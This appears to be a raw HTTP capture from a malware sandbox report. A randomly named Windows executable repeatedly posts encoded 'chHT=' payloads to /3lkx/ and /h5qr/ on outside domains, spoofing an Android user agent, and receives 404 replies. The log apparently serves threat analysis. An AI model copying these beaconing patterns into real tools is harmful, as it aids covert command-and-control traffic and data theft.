                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:49:53.716388941 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:49:53 GMT
                      Content-Type: text/html; charset=utf-8
                      Content-Length: 2966
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: "66cd104a-b96"
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                      Sep 10, 2024 08:49:53.716442108 CEST1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                      Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                      Sep 10, 2024 08:49:53.716483116 CEST698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                      Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      25192.168.2.449762172.96.191.39801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:50:02.898906946 CEST728OUTPOST /3lkx/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.bola88site.one
                      Origin: http://www.bola88site.one
                      Referer: http://www.bola88site.one/3lkx/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 4b 64 39 47 63 59 61 4e 77 50 4d 6e 6d 30 62 6c 4a 73 73 69 7a 4c 5a 49 37 45 51 55 2b 79 32 71 73 41 6d 47 47 55 30 6f 47 47 2b 52 45 73 68 51 7a 6f 34 75 66 47 2f 73 4d 59 4b 2f 48 63 56 53 6f 67 6c 42 73 47 39 74 49 45 33 4c 77 71 61 2f 58 36 33 35 79 32 6b 67 38 2b 41 51 56 54 54 38 69 54 2b 4f 2f 73 77 73 33 33 34 34 79 44 78 78 70 42 67 61 66 62 42 66 4f 4f 2b 2b 32 4c 59 78 47 2b 6d 73 6c 36 71 51 36 49 44 72 66 4b 6b 4e 33 6c 49 5a 4d 4d 46 4b 49 61 65 35 5a 4b 71 34 69 4c 43 34 36 31 33 6e 64 56 4d 6c 47 57 66 30 78 4f 43 66 58 41 3d 3d
                      Data Ascii: chHT=cgJ0RJsNAcCJKd9GcYaNwPMnm0blJssizLZI7EQU+y2qsAmGGU0oGG+REshQzo4ufG/sMYK/HcVSoglBsG9tIE3Lwqa/X635y2kg8+AQVTT8iT+O/sws3344yDxxpBgafbBfOO++2LYxG+msl6qQ6IDrfKkN3lIZMMFKIae5ZKq4iLC4613ndVMlGWf0xOCfXA==
                      Sep 10, 2024 08:50:03.793545008 CEST1033INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 796
                      date: Tue, 10 Sep 2024 06:50:03 GMT
                      server: LiteSpeed
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      26192.168.2.449763172.96.191.39801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:50:05.444379091 CEST748OUTPOST /3lkx/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.bola88site.one
                      Origin: http://www.bola88site.one
                      Referer: http://www.bola88site.one/3lkx/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 46 5a 42 47 66 2f 75 4e 34 50 4d 6d 71 55 62 6c 47 4d 73 6d 7a 4c 56 49 37 42 77 45 2b 41 43 71 74 69 2b 47 55 6d 63 6f 54 47 2b 52 50 4d 68 66 74 59 34 6c 66 47 79 4d 4d 5a 32 2f 48 63 52 53 6f 69 74 42 76 31 6c 73 49 55 33 56 38 4b 61 35 59 61 33 35 79 32 6b 67 38 2b 6b 75 56 58 2f 38 6a 69 75 4f 2b 4e 77 76 70 6e 34 37 37 6a 78 78 74 42 67 65 66 62 42 70 4f 4b 32 59 32 49 77 78 47 36 69 73 6c 72 71 66 30 49 44 70 42 36 6b 44 6e 6c 74 46 56 4a 6f 31 4f 5a 71 75 57 5a 48 46 71 74 54 69 72 45 57 77 50 56 6f 57 62 52 57 41 38 4e 2f 57 4d 4b 6f 4e 63 38 4d 78 70 75 58 71 6b 52 65 34 75 4d 6a 58 66 6d 45 3d
                      Data Ascii: chHT=cgJ0RJsNAcCJFZBGf/uN4PMmqUblGMsmzLVI7BwE+ACqti+GUmcoTG+RPMhftY4lfGyMMZ2/HcRSoitBv1lsIU3V8Ka5Ya35y2kg8+kuVX/8jiuO+Nwvpn477jxxtBgefbBpOK2Y2IwxG6islrqf0IDpB6kDnltFVJo1OZquWZHFqtTirEWwPVoWbRWA8N/WMKoNc8MxpuXqkRe4uMjXfmE=
                      Sep 10, 2024 08:50:06.364757061 CEST1033INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 796
                      date: Tue, 10 Sep 2024 06:50:06 GMT
                      server: LiteSpeed
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      27192.168.2.449764172.96.191.39801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:50:07.991519928 CEST10830OUTPOST /3lkx/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.bola88site.one
                      Origin: http://www.bola88site.one
                      Referer: http://www.bola88site.one/3lkx/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 46 5a 42 47 66 2f 75 4e 34 50 4d 6d 71 55 62 6c 47 4d 73 6d 7a 4c 56 49 37 42 77 45 2b 41 36 71 73 52 32 47 47 78 41 6f 42 32 2b 52 43 73 68 63 74 59 34 6b 66 47 71 41 4d 5a 36 46 48 66 35 53 71 48 35 42 75 41 4a 73 44 55 33 56 30 71 61 38 58 36 32 6a 79 32 30 6b 38 2b 30 75 56 58 2f 38 6a 68 6d 4f 6f 73 77 76 72 6e 34 34 79 44 78 31 70 42 67 36 66 64 70 35 4f 4b 79 75 33 34 51 78 42 65 47 73 6e 5a 79 66 38 49 44 76 41 36 6c 46 6e 6c 52 73 56 4e 4a 47 4f 5a 75 49 57 61 62 46 70 73 53 43 79 58 2f 6d 63 57 30 79 45 41 43 38 78 64 44 61 4d 34 34 79 56 35 6f 70 36 65 66 66 75 69 4f 38 33 38 6e 57 45 43 6d 6b 56 75 4f 6f 6d 48 74 61 31 31 34 72 4c 59 6b 63 41 6e 65 77 4d 43 65 56 32 5a 63 4f 79 4c 59 66 39 68 64 4b 71 4e 57 61 6e 66 51 49 6c 58 63 6b 4a 30 6a 74 55 57 67 79 46 47 4a 6e 44 72 7a 39 73 37 46 33 62 67 6a 6b 6c 45 58 59 70 43 50 36 65 75 54 42 38 69 7a 77 30 39 4e 55 47 70 44 74 33 63 58 62 4f 56 4e 51 71 4f 52 71 71 44 6b 69 42 44 36 66 7a [TRUNCATED]
                      Data Ascii: chHT=cgJ0RJsNAcCJFZBGf/uN4PMmqUblGMsmzLVI7BwE+A6qsR2GGxAoB2+RCshctY4kfGqAMZ6FHf5SqH5BuAJsDU3V0qa8X62jy20k8+0uVX/8jhmOoswvrn44yDx1pBg6fdp5OKyu34QxBeGsnZyf8IDvA6lFnlRsVNJGOZuIWabFpsSCyX/mcW0yEAC8xdDaM44yV5op6effuiO838nWECmkVuOomHta114rLYkcAnewMCeV2ZcOyLYf9hdKqNWanfQIlXckJ0jtUWgyFGJnDrz9s7F3bgjklEXYpCP6euTB8izw09NUGpDt3cXbOVNQqORqqDkiBD6fznmiEUO5FPFVX8iY0hBljT0mEqRIGVA3Z/9ZMZf5F4vU/wQV68tP7pfKHRruZgxp8OeRpa5X6egVX/8oTPNq8nrkcHMJFdKInIN41BXgaMPqHGVPDKYHjL9xMcgK343iP9aBWSS32aPmhKSIqUb2mMt4qGmmFrJre5/xXGV7po8xnB9mR2xE0pPivLwFL4i9rzY2sIIfJnsBmXL40ePbzsEciD1ztPboTzotrZ6yodxe1oBTicsApXp36JNXi+zXEpEDNbvZXRaE9gE+SgrBA+6P69rQvcrsWcC4yO9F46dP6TMgoOEwKCFNRQZW1P5OOXu7j9WnMf0NS9WTEsY+rGNcVWXsaWWtaAbOav5KZwpAO/7EL4w0sIrqg/vRyYTJCQWEVtYIf8M3VBtzoFbw9rqyP+sBJikXQ0zsb5ODG+OYSogZLhZD5klhNh5KUqLQNg3xvWDbR9sUMzPgTS3V8RqcMrTsR3utpIrqr1Qn6s/lCmmu/Kjhl+N99AImfCvyfpnaetGxvwn83jVIE0JkW4EcBGLucOqUSu6e0hH5JPgAST++LCW6KFa8PH0rkeaQCuiSQXv0higpk+ysMaiHWnaJaCK/3Fal1x1+7meXrKE6yUBVdaEhVYk/d5kGQ2bMxnj+keJsH4S+AzVVaHBbfWiNqwC5V/OOm0N [TRUNCATED]
                      Sep 10, 2024 08:50:08.902043104 CEST1033INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 796
                      date: Tue, 10 Sep 2024 06:50:08 GMT
                      server: LiteSpeed
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      28192.168.2.449765172.96.191.39801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:50:10.541189909 CEST461OUTGET /3lkx/?chHT=RihUS+ZcBcWtP49cUqKa3/5xmWqGYNk0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4ueBHr6qafW/u83WMg9sFtSHOnpje/7KsHpWM=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.bola88site.one
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:50:11.450560093 CEST1033INHTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 796
                      date: Tue, 10 Sep 2024 06:50:11 GMT
                      server: LiteSpeed
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      29192.168.2.449766104.21.20.125801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:50:16.509829044 CEST722OUTPOST /h5qr/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.kckartal.xyz
                      Origin: http://www.kckartal.xyz
                      Referer: http://www.kckartal.xyz/h5qr/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 65 5a 65 68 70 55 53 32 50 72 75 39 32 37 71 71 62 66 55 46 4e 69 6e 32 50 4e 4e 6d 71 39 54 31 4c 49 71 49 61 78 77 70 6f 4b 53 63 56 66 77 41 4f 75 69 4e 63 30 53 45 61 64 72 38 46 4e 6c 32 6e 4a 52 63 63 32 30 6f 4a 41 33 35 72 71 67 52 36 69 4c 67 7a 37 58 62 39 79 72 66 34 49 2b 49 53 78 33 42 2b 43 4b 69 6a 31 6c 58 61 79 6f 4d 63 6c 73 6e 34 41 36 4f 51 73 74 53 35 70 4d 65 77 77 56 47 59 70 46 4c 4d 66 2b 47 4a 72 49 43 43 66 30 74 61 2b 6d 6a 63 72 74 65 62 74 57 41 65 7a 38 51 4c 51 37 41 56 55 6f 30 6e 31 74 6d 7a 42 52 70 67 3d 3d
                      Data Ascii: chHT=yZO9aB74W3A3ueZehpUS2Pru927qqbfUFNin2PNNmq9T1LIqIaxwpoKScVfwAOuiNc0SEadr8FNl2nJRcc20oJA35rqgR6iLgz7Xb9yrf4I+ISx3B+CKij1lXayoMclsn4A6OQstS5pMewwVGYpFLMf+GJrICCf0ta+mjcrtebtWAez8QLQ7AVUo0n1tmzBRpg==
                      Sep 10, 2024 08:50:17.106955051 CEST745INHTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:50:17 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      vary: User-Agent
                      x-turbo-charged-by: LiteSpeed
                      cf-cache-status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bLEcc1cLL1ICigzoYDwASGAgP1R7KckHMuoiluxx1k1kBejQlHb5JuX0vYDADojZfx5zWhPBL0RBqxZf86Pr%2BnAC8nwtp8%2FANO6VMCbJ9s0Z4yISbJqWLz3nONEyZ1MOjXLZ"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8c0d7b9fa90e7290-EWR
                      Content-Encoding: gzip
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                      Data Ascii: f
                      Sep 10, 2024 08:50:17.108196974 CEST735INData Raw: 32 63 33 0d 0a 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07
                      Data Ascii: 2c3dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhy


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      30192.168.2.449767104.21.20.125801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:50:19.098897934 CEST742OUTPOST /h5qr/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.kckartal.xyz
                      Origin: http://www.kckartal.xyz
                      Referer: http://www.kckartal.xyz/h5qr/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
